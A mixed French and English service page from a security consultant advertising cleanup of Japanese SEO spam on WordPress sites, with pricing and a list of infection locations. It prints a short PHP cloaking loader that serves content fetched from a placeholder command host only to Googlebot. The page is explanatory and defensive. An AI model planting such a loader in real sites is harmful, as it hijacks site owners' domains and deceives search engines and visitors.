threatover Patrik Grobshäuser

Japanese SEO spam · cloaked · cleaned

Japanese SEO spam removal.

Suppression manuelle de l'injection de spam SEO japonais. Nettoyage fichiers et base de données. Purge du sitemap. Vecteur d'entrée identifié. Demandes de réexamen soumises. Forfait $279.

Mechanism

Ce qu'est le « spam SEO japonais », techniquement.

Un attaquant plante un loader PHP sur votre site (généralement dans wp-content/plugins/ ou wp-content/uploads/). Le loader génère des milliers de pages synthétiques avec des mots-clés japonais et des titres de produits japonais. Il réécrit votre sitemap pour que Googlebot les trouve. Les vrais visiteurs ne voient jamais le spam — le loader vérifie le User-Agent et sert votre site normal aux humains.

Le temps que vous le remarquiez, Google a indexé des centaines ou milliers d'URL en japonais sur votre domaine. Search Console envoie un avertissement de sécurité par e-mail. Les positions chutent. Le libellé « Piraté : injection de contenu » apparaît dans Search Console.

Typical cloaking loader
01 <?php
02 // Serve spam only to Googlebot. Real users see the normal site.
03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
04     $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']);
05     echo $payload;
06     exit;
07 }

What I remove

Chaque endroit où cette infection se cache.

  • File loaders

    PHP obfusqué dans plugins, mu-plugins, thèmes et uploads. Nous lisons les diffs, pas les noms de fichiers.

  • Database

    Contenu spam injecté dans wp_posts, entrées wp_options autoload malveillantes, wp_usermeta suspect.

  • Plan du site

    Entrées de sitemap synthétiques générées supprimées ; sitemap propre régénéré et resoumis à Search Console.

  • Htaccess

    Règles de réécriture .htaccess et nginx qui redirigent Googlebot ou des chemins spécifiques — annulées.

  • Admin users

    Comptes administrateur dormants créés par le loader — supprimés. Tous les secrets admin restants sont rotés.

  • Entry vector

    Plugin vulnérable ou identifiant volé identifié et fermé. Sans cette étape, le même trou est réutilisé en quelques semaines.

Tarifs

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage

Monitoring

$29 / mo

per site, cancel any time

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

E-mail [email protected] or use the contact form.